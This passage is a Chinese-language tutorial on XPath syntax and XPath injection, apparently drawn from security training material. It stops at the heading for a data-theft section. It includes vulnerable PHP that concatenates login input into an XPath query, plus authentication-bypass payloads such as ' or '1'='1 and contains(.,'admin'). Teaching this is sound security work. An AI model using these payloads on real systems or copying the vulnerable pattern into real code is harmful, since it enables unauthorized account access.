概念

XML路径语言(XPath)是一种用于可扩展语言(XML)数据的查询语言。具体来说,我们可以使用XPath来构造针对XML格式存储的XPath查询,如果用户输入未经适当清理就插入到XPath查询,就会产生类似于SQL注入的XPath漏洞

基础

要深入理解XPath,我们需要理解XPath的工作原理。

<?xml version="1.0" encoding="UTF-8"?>
<modules>
    <module>
      <title>Web Attacks</title>
      <author>21y4d</author>
      <tier difficulty="medium">2</tier>
      <category>offensive</category>
    </module>
    
    <!-- this is a comment -->
    <module>
      <title>Attacking Enterprise Networks</title>
      <author co-author="LTMB)B">mrb3n</author>
      <tier difficulty="medium">2</tier>
      <category>offensive</category>
    </module>
</modules>

xml文档通常以XML declaration开头,指明xml的版本和编码。

xml文档中的数据以树结构格式化,根节点是root节点。此外,还有子节点例如这里的module和title,同时,节点还可以有自己的属性,比如我们这里的difficulty和co-author

而XPath 是一门在 XML 文档中查找信息的语言。XPath 是 XSLT 中的主要元素。XQuery 和 XPointer 均构建于 XPath 表达式之上

选取节点

XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。 下面列出了最有用的路径表达式:

表达式描述
nodename选取此节点的所有子节点。
/从根节点选取(取子节点)。
//从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置(取子孙节点)。
.选取当前节点。
..选取当前节点的父节点。
@选取属性。

在下面的表格中,我们已列出了一些路径表达式以及表达式的结果:

路径表达式结果
bookstore选取所有名为 bookstore 的节点。
/bookstore选取根元素 bookstore。

注释:假如路径起始于正斜杠( / ),则此路径始终代表到某元素的绝对路径!
bookstore/book选取属于 bookstore 的子元素的所有 book 元素。
//book选取所有 book 子元素,而不管它们在文档中的位置。
bookstore//book选择属于 bookstore 元素的后代的所有 book 元素,而不管它们位于 bookstore 之下的什么位置。
//@lang选取名为 lang 的所有属性。

谓语(Predicates)

谓语用来查找某个特定的节点或者包含某个指定的值的节点。

谓语被嵌在方括号中。

在下面的表格中,我们列出了带有谓语的一些路径表达式,以及表达式的结果:

路径表达式结果
/bookstore/book[1]选取属于 bookstore 子元素的第一个 book 元素。
/bookstore/book[last()]选取属于 bookstore 子元素的最后一个 book 元素。
/bookstore/book[last()-1]选取属于 bookstore 子元素的倒数第二个 book 元素。
/bookstore/book[position()<3]选取最前面的两个属于 bookstore 元素的子元素的 book 元素。
//title[@lang]选取所有拥有名为 lang 的属性的 title 元素。
//title[@lang='eng']选取所有 title 元素,且这些元素拥有值为 eng 的 lang 属性。
/bookstore/book[price>35.00]选取 bookstore 元素的所有 book 元素,且其中的 price 元素的值须大于 35.00。
/bookstore/book[price>35.00]//title选取 bookstore 元素中的 book 元素的所有 title 元素,且其中的 price 元素的值须大于 35.00。

谓语支持以下操作:

操作数解释
+加法
-减法
*乘法
div除法
=等于
!=不等于
<小于
⇐小于等于
>大于
>=大于等于
or逻辑或
and逻辑与
mod取模

选取未知节点

XPath 通配符可用来选取未知的 XML 元素。

通配符描述
*匹配任何元素节点。
@*匹配任何属性节点。
node()匹配任何类型的节点。

在下面的表格中,我们列出了一些路径表达式,以及这些表达式的结果:

路径表达式结果
/bookstore/*选取 bookstore 元素的所有子元素。
//*选取文档中的所有元素。
//title[@*]选取所有带有属性的 title 元素。

选取若干路径

通过在路径表达式中使用”|“运算符,您可以选取若干个路径。

在下面的表格中,我们列出了一些路径表达式,以及这些表达式的结果:

路径表达式结果
//book/title | //book/price选取 book 元素的所有 title 和 price 元素。
//title | //price选取文档中的所有 title 和 price 元素。
/bookstore/book/title | //price选取属于 bookstore 元素的 book 元素的所有 title 元素,以及文档中所有的 price 元素。

利用方式

身份绕过验证

基础

<users>
    <user>
      <name first="Kaylie" last="Grenvile"/>
      <id>1</id>
      <username>kgrenvile</username>
      <password>P@ssW0rd!</password>
    </user>
    <user>
      <name first="Admin" last="Admin"/>
      <id>1</id>
      <username>admin</username>
      <password>admin</password>
    </user>
    <user>
      <name first="Academy" last="Student"/>
      <id>1</id>
      <username>htb_student</username>
      <password>Academy_student!</password>
    </user>
</users>

为了执行身份验证,Web应用程序可能会执行以下查询:/users/user[username/text()='htb_student' and password/text()='Academy_student!']

如果说这个查询类似于sql注入一样未进行清理就将用户和密码插入其中,那么就可能造成漏洞,比如php代码如下

$query = "/users/user[username/text()='" . $_POST['username'] . "' and
password/text()='" . $_POST['password'] . "']";
$results = $xml->xpath($query);

存在漏洞的PHP代码在未进行清理前就将用户名和密码插入查询中:

$query = "/users/user[username/text()='" . $_POST['username'] . "' and
password/text()='" . $_POST['password'] . "']";
$results = $xml->xpath($query);

通过注入用户名和密码来绕过身份验证,使得XPath查询始终评估为 true 。通过将值 ' or '1'='1作为用户名和密码注入即可实现。生成的XPath查询如下:

/users/user[username/text()='admin' or '1'='1' and password/text()='abc']

利用

在现实场景中,密码通常会被哈希处理。此外,我们可能不知道有效的用户名,因此无法使用上述负载。幸运的是,我们可以使用更高级的注入负载来绕过身份验证。

<users>
    <user>
      <name first="Kaylie" last="Grenvile"/>
      <id>1</id>
      <username>kgrenvile</username>
      <password>8a24367a1f46c141048752f2d5bbd14b</password>
    </user>
    <user>
      <name first="Admin" last="Admin"/>
      <id>2</id>
      <username>obfuscatedadminuser</username>
      <password>21232f297a57a5a743894a0e4a801fc3</password>
    </user>
    <user>
      <name first="Academy" last="Student"/>
      <id>3</id>
      <username>htb-stdnt</username>
      <password>295362c2618a05ba3899904a6a3f5bc0</password>
    </user>
</users>

由于密码在插入查询前会被哈希处理,注入' or '1'='1 用户名和密码将导致以下查询: /users/user[username/text()='' or '1'='1' and password/text()='59725b2f19656a33b3eed406531fb474'],这样因为and的优先度高强行变成Flase了

首先,我们可以在用户名中注入一个双or子句,使XPath返回True,从而返回所有用户节点

/users/user[username/text()='' or true() or '' and password/text()='59725b2f19656a33b3eed406531fb474']

但是接口明显是塞不下这么多信息的,我们需要通过位置迭代所有用户找到我们需要的用户

/users/user[username/text()='' or contains(.,'admin') or '' and
password/text()='59725b2f19656a33b3eed406531fb474']

此查询返回所有包含字符串admin的用户节点,这些节点可以是任何子节点。由于username节点是user 节点的子节点,因此此查询返回所有用户,这些用户的用户名中 包含子字符串admin 。

数据窃取